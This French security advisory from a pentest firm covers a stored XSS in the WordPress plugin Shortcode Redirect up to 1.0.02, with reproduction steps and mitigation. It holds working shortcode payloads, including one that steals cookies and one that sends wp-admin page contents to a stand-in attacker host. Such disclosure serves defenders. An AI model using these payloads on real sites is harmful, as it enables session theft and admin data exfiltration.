Shortcode Redirect <= 1.0.02: XSS stockée via le paramètre sec

> Découverte par Rooting Studio — Corrigé en 1.0.03 — Priorité: faible

Résumé

• Logiciel: Shortcode Redirect (plugin WordPress)
• Versions vulnérables: <= 1.0.02
• Corrigé dans: 1.0.03
• Gravité: Moyenne (CVSS 6.5)
• Type: Cross-Site Scripting (XSS) stockée
• Privilèges requis: Contributor (édition de contenu)

Description technique

Le paramètre sec du shortcode [redirect] est insuffisamment validé: il utilise esc_attr() mais est réinséré dans un attribut content de balise meta, permettant de casser le contexte HTML et d'injecter du JavaScript.

Reproduction

1. Installer Shortcode Redirect 1.0.02

2. Se connecter avec des privilèges Contributor ou plus

3. Créer un article et insérer:

[redirect url='https://google.com' sec='0"><script>alert("Stored XSS Vulnerability")</script><meta content="']

4. Publier et visiter la page: l'alerte s'exécute (XSS confirmée).

Payloads avancés

• Vol de cookies:

[redirect url='https://google.com' sec='0"><script>document.location="http://attacker.com/steal?c="+document.cookie</script><meta content="']

• Exfiltration de page admin:

[redirect url='https://google.com' sec='0"><script>fetch("/wp-admin/",{credentials:"include"}).then(r=>r.text()).then(d=>fetch("http://attacker.com/admin",{method:"POST",body:d}))</script><meta content="']

Mitigation

• Mettre à jour en 1.0.03 (correctif disponible).
• Restreindre l'usage du shortcode aux rôles de confiance.
• Filtrer côté serveur et encoder correctement le contenu dans son contexte HTML.

Références

• OWASP Top 10 — A03: Injection
• Bonnes pratiques d'encodage de sortie (contextuel)

—

Besoin d’un audit pragmatique et reproductible ? Découvrez notre **pentest web**.